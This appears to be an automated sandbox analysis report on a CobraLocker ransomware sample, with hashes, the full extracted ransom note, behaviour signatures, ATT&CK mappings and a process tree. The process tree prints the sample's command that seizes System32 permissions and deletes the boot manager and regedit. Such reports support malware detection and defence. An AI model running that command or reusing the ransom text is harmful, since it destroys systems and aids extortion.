Analysis

  • max time kernel
    97s
  • max time network
    47s
  • platform
    windows7_x64
  • resource
    win7-20220414-en
  • submitted
    26-06-2022 02:01

General

  • Target

    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe

  • Size

    3.1MB

  • MD5

    6a85d0ba4d1db63d390b7a071d60e0ef

  • SHA1

    79a32ee067e19b43bc3f29fde3a3ff95986f8e2e

  • SHA256

    369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412

  • SHA512

    16a97e39d6a373c3eb7140c93fd61afd12a7569d262ee67a47ac548cffc5735379dee85ba68dabb9a0aa768e5505fe6a451fd08aae68006aa1962b2861c8a6ce

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\HOW-TO-DECRYPT.TXT

Ransom Note
Ooops! All your important files are encrypted! [+] What happend to my computer? [+] All your important files are encrypted. No one can help you to restore files without our special decryptor. Backups were either encrypted or deleted. Shadow copies also removed. If you want to restore some of your files for free write to email (contact is below) and attach 2-3 encrypted files. You will receive decrypted samples. To decrypt other files you have to pay $250. [+] How do i pay? [+] Payment is accepted in Bitcoin only. Please check the current price of Bitcoin and buy some Bitcoins. And send the correct amount to the address specified at the bottom. [+] How can i contact? [+] 1.Download Tor browser (https://www.torproject.org/) 2.Create account on mail2tor (http://mail2tor2zyjdctd.onion/) 3.Write email to us (CobraLocker@mail2tor.com) [+] What if i already paid? [+] Send your Bitcoin wallet ID to e-mail provided above. Attention! 1.Do not modify encrypted files. 2.Do not try decrypt your data using third party software. 3.Do not turn off your computer. Our bitcoin address: bc1q80xu9j6wpesm2jg2w4pzpyhqjd5wsrg46ap6pe
Emails

CobraLocker@mail2tor.com

URLs

http://mail2tor2zyjdctd.onion/

Signatures

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 1 IoCs
  • Disables Task Manager via registry modification
  • Modifies extensions of user files 3 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Possible privilege escalation attempt 5 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Modifies file permissions 1 TTPs 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 2 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Checks whether UAC is enabled 1 TTPs 1 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious use of AdjustPrivilegeToken 5 IoCs
  • Suspicious use of WriteProcessMemory 24 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe
    "C:\Users\Admin\AppData\Local\Temp\369a4f163bf5552d238f52607c828c105645d29d6f2446363cdfec118f9ea412.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Modifies extensions of user files
    • Checks BIOS information in registry
    • Checks whether UAC is enabled
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:1192
    • C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32 && icacls C:\Windows\System32 /grant %username%:F && takeown /f C:\Windows\System32\drivers && icacls C:\Windows\System32\drivers /grant %username%:F && takeown /f C:\Windows\System32\LogonUI.exe && icacls C:\Windows\System32\LogonUI.exe /grant %username%:F && takeown /f C:\bootmgr && icacls C:\bootmgr /grant %username%:F && attrib -s -r -h C:\bootmgr && del C:\bootmgr && takeown /f C:\Windows\regedit.exe && icacls C:\Windows\regedit.exe /grant %username%:F && del C:\Windows\regedit.exe && Exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1524
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:2008
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32 /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1520
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\drivers
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:844
      • C:\Windows\SysWOW64\icacls.exe
        icacls C:\Windows\System32\drivers /grant Admin:F
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        PID:1804
      • C:\Windows\SysWOW64\takeown.exe
        takeown /f C:\Windows\System32\LogonUI.exe
        3⤵
        • Possible privilege escalation attempt
        • Modifies file permissions
        • Suspicious use of AdjustPrivilegeToken
        PID:396

Network

MITRE ATT&CK Matrix ATT&CK v6

Defense Evasion

Virtualization/Sandbox Evasion

1
T1497

File Permissions Modification

1
T1222

Credential Access

Credentials in Files

1
T1081

Discovery

Query Registry

2
T1012

Virtualization/Sandbox Evasion

1
T1497

System Information Discovery

3
T1082

Collection

Data from Local System

1
T1005

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/396-67-0x0000000000000000-mapping.dmp
  • memory/844-65-0x0000000000000000-mapping.dmp
  • memory/1192-54-0x00000000765C1000-0x00000000765C3000-memory.dmp
    Filesize

    8KB

  • memory/1192-57-0x0000000001130000-0x0000000001960000-memory.dmp
    Filesize

    8.2MB

  • memory/1192-58-0x0000000001130000-0x0000000001960000-memory.dmp
    Filesize

    8.2MB

  • memory/1192-59-0x0000000001130000-0x0000000001960000-memory.dmp
    Filesize

    8.2MB

  • memory/1192-60-0x0000000077B80000-0x0000000077D00000-memory.dmp
    Filesize

    1.5MB

  • memory/1192-61-0x0000000001130000-0x0000000001960000-memory.dmp
    Filesize

    8.2MB

  • memory/1520-64-0x0000000000000000-mapping.dmp
  • memory/1524-62-0x0000000000000000-mapping.dmp
  • memory/1804-66-0x0000000000000000-mapping.dmp
  • memory/2008-63-0x0000000000000000-mapping.dmp